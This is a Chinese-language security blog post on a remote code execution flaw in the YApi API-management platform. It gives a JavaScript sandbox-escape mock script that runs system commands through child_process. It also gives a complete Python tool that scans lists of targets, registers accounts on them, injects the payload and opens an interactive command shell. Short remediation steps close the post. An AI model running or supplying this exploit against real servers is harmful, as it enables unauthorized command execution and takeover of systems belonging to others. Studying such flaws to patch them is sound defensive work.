YApi远程代码执行漏洞


官网

https://hellosean1025.github.io/yapi/
https://github.com/ymfe/yapi

简介

YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。

漏洞原理

通过注册账号密码登录后,添加项目→添加接口→高级Mock→脚本→开启脚本→写入代码即可执行

影响范围

<=V1.92

漏洞利用

注册账号密码

登录系统

添加项目

添加接口

添加mock脚本

const asdf = this
const asdf1 = this.constructor
const asdf2 = asdf1.constructor
const asdf3 = asdf2('return process')
const asdf4 = asdf3()
mockJson = asdf4.mainModule.require("child_process").execSync("echo asdf1234").toString()

mock脚本地址

访问Mock地址

Exp

#!/usr/bin/python3
import requests
import time
import json
import argparse
import base64

parser=argparse.ArgumentParser(description="YApi Poc&Exp    --By Infiltrator",epilog="GitHub:https://github.com/nhpt")

group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-u',help='目标URL,如http://www.example.com')
group.add_argument('-f',type=argparse.FileType('r',encoding='utf8'),help='目标URL文件,以换行分割')

group1 = parser.add_mutually_exclusive_group(required=True)
group1.add_argument('-c',action='store_true',help='漏洞扫描模式,仅检测漏洞')
group1.add_argument('-e',action='store_true',help='漏洞利用模式,仅检测漏洞')

parser.add_argument('-p',help='设置代理地址和端口,如:http://127.0.0.1:8080')
parser.add_argument('-t',help='设置超时时间,单位:秒')
parser.add_argument('-H',help='设置HTTP请求头,json格式,如:{"X-Forwarded-For":"127.0.0.1"}')
parser.add_argument('-U',help='指定用户名,如:test')
parser.add_argument('-P',help='指定密码,如:test')
parser.add_argument('-nr',action='store_true',help='不使用注册功能,需要使用-U和-P指定用户名和密码')

parser.add_argument('-o', type=argparse.FileType('w', encoding='UTF-8'),help='保存扫描结果到文本文件')

args=parser.parse_args()

requests.packages.urllib3.disable_warnings()
proxies=None
timeout=None
head = {
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
}

rand_num=str(time.time()).split('.')[1]
user="e1f0a2bc"+rand_num
passwd="[email protected]"

def proxy(proxy):
    try:
        key=proxy.split('://')[0]
        return {key:proxy}
    except:
        exit('[!] 代理地址格式有误!')

def headers(header):
    try:
        headers=json.loads(header)
        return headers
    except:
        exit('[!] HTTP请求头格式有误!')

# 注册用户
def register(url,user=user,passwd=passwd):
    data={"email":user,"password":passwd,"username":user}
    reg=url+"/api/user/reg"
    try:
        r=requests.post(reg,json=data,headers=head,timeout=timeout,proxies=proxies,verify=False)
        if "Set-Cookie" in r.headers:
            print("[*] 注册成功!用户名:"+user+" 密码:"+passwd,url)
            return True
        else:
            #print("[!] 注册失败!",url)
            return False
    except:
        return False
# 登录
def login(url,user=user,passwd=passwd):
    data={"email":user,"password":passwd}
    login=url+"/api/user/login"
    try:
        r=requests.post(login,json=data,headers=head,timeout=timeout,proxies=proxies,verify=False)
        if "Set-Cookie" in r.headers:
            #print("[+] 登录成功!",url)
            return requests.utils.dict_from_cookiejar(r.cookies)
        else:
            #print("[!] 登录失败!",url)
            return False
    except:
        return False
# 获取group_id
def get_groupid(url,cookie):
    group_url=url+"/api/group/get_mygroup"
    try:
        r=requests.get(group_url,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
        group_id=json.loads(r.text).get("data").get("_id")
        if group_id:
            return group_id
        else:
            print("[!] 未获得group_id!",url)
            return False
    except:
        return False
# 添加项目,返回project_id
def add_project(url,cookie,group_id):
    data={"name":user,"group_id":group_id,"icon":"code-o","color":"green","project_type":"private"}
    project_url=url+"/api/project/add"
    try:
        r=requests.post(project_url,json=data,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
        project_id=json.loads(r.text).get("data").get("_id")
        if project_id:
            return project_id
        else:
            print("[!] 未获得project_id!",url)
            return False
    except:
        return False
# 获取catid
def get_catid(url,cookie,project_id):
    catid_url=url+"/api/project/get?id="+str(project_id)
    try:
        r=requests.get(catid_url,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
        catid=json.loads(r.text).get("data").get("cat")[0].get("_id")
        if catid:
            return catid
        else:
            print("[!] 未获得catid!",url)
            return False
    except:
        return False
# 添加接口,返回interface_id
def add_interface(url,cookie,catid,project_id):
    interface_url=url+"/api/interface/add"
    title=user
    data={"method":"GET","catid":catid,"title":title,"path":"/"+title,"project_id":project_id}
    try:
        r=requests.post(interface_url,json=data,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
        interface_id=json.loads(r.text).get("data").get("_id")
        if interface_id:
            return interface_id
        else:
            print("[!] 未获得interface_id!",url)
            return False
    except:
        return False

# 添加高级mock脚本
def add_mock(url,cookie,project_id,interface_id,cmd="echo "+user):
    mock_url=url+"/api/plugin/advmock/save"
    mock_script="const "+user+" = this\nconst "+user+"1"+" = this.constructor\nconst "+user+"2"+" = "+user+"1"+".constructor\nconst "+user+"3"+" = "+user+"2"+"('return process')\nconst "+user+"4"+" = "+user+"3"+"()\nmockJson = "+user+"4"+".mainModule.require(\"child_process\").execSync(\""+cmd+"\").toString()"
    mock_script2="const "+user+" = this\nconst "+user+"1"+" = this.constructor\nconst "+user+"2"+" = "+user+"1"+".constructor\nconst "+user+"3"+" =  new "+user+"2"+"('return Buffer')()\nconst "+user+"4"+" = new "+user+"2"+"('return process')()\n"+user+"5"+"  = new "+user+"3"+"('"+base64.b64encode(cmd.encode()).decode()+"','base64').toString()\nmockJson = new "+user+"3"+"("+user+"4"+".mainModule.require('child_process').execSync("+user+"5"+"').toString()).toString()"
    data={"project_id":project_id,"interface_id":interface_id,"mock_script":mock_script,"enable":True}
    try:
        r=requests.post(mock_url,json=data,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
        api_url=url+"/mock/"+str(project_id)+"/"+user
        return api_url
    except:
        return False
# 执行mock脚本
def get_mock(url):
    try:
        r=requests.get(url,headers=head,timeout=timeout,proxies=proxies,verify=False)
        return r.text
    except:
        return False

def check(url):
    if not args.nr:
        res=register(url,user,passwd)
        if not res:
            print("[-] "+url+" 不存在远程代码执行漏洞!")
            return False
    cookie=login(url,user,passwd)
    if not cookie:
        print("[-] "+url+" 不存在远程代码执行漏洞!")
        return False
    group_id=get_groupid(url,cookie)
    if not group_id:
        print("[-] "+url+" 不存在远程代码执行漏洞!")
        return False
    #print("[+] 成功获取group_id:",group_id)
    project_id=add_project(url,cookie,group_id)
    if not project_id:
        print("[-] "+url+" 不存在远程代码执行漏洞!")
        return False
    #print("[+] 成功添加项目,project_id:",project_id)
    catid=get_catid(url,cookie,project_id)
    if not catid:
        print("[-] "+url+" 不存在远程代码执行漏洞!")
        return False
    #print("[+] 成功获取catid:",catid)
    interface_id=add_interface(url,cookie,catid,project_id)
    if not interface_id:
        print("[-] "+url+" 不存在远程代码执行漏洞!")
        return False
    #print("[+] 成功添加接口,interface_id:",interface_id)
    api_url=add_mock(url,cookie,project_id,interface_id)
    if not api_url:
        print("[-] "+url+" 不存在远程代码执行漏洞!")
        return False
    print("[+] 接口地址:",api_url)
    res=get_mock(api_url)
    if user in res:
        print("[+] "+url+" 存在远程代码执行漏洞!")
        if args.o:
            args.o.write(url+'\n')
    else:
        print("[-] "+url+" 不存在远程代码执行漏洞!")

def exploit(url):
    if not args.nr:
        res=register(url,user,passwd)
        if not res:
            return False
    cookie=login(url,user,passwd)
    if not cookie:
        return False
    group_id=get_groupid(url,cookie)
    if not group_id:
        return False
    print("[+] 成功获取group_id:",group_id)
    project_id=add_project(url,cookie,group_id)
    if not project_id:
        return False
    print("[+] 成功添加项目,project_id:",project_id)
    catid=get_catid(url,cookie,project_id)
    if not catid:
        return False
    print("[+] 成功获取catid:",catid)
    interface_id=add_interface(url,cookie,catid,project_id)
    if not interface_id:
        return False
    print("[+] 成功添加接口,interface_id:",interface_id)
    while 1:
        cmd=input("$ ")
        if 'exit' in cmd:
            exit()
        api_url=add_mock(url,cookie,project_id,interface_id,cmd)
        if not api_url:
            return False
        res=get_mock(api_url)
        print(res)

if args.u:
    urls=[args.u.strip('/')]
else:
    urls=[x.strip('/\n') for x in args.f.readlines()]
#print(urls)
if args.U:
    user=args.U
if args.P:
    passwd=args.P
if args.p:
    proxies=proxy(args.p)
if args.t:
    timeout=args.t
if args.H:
    head=headers(args.H)
if args.c:
    for u in urls:
        check(u)
if args.e:
    for u in urls:
        exploit(u)

修复建议

  1. 关闭YAPI用户注册功能,以阻断攻击者注册。
  2. 利用请求白名单的方式限制 YAPI 相关端口。
  3. 排查 YAPI 服务器是否存在恶意访问记录。
  4. 升级至最新版本

声明:Hack All Sec的博客|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - YApi远程代码执行漏洞


Hacker perspective for security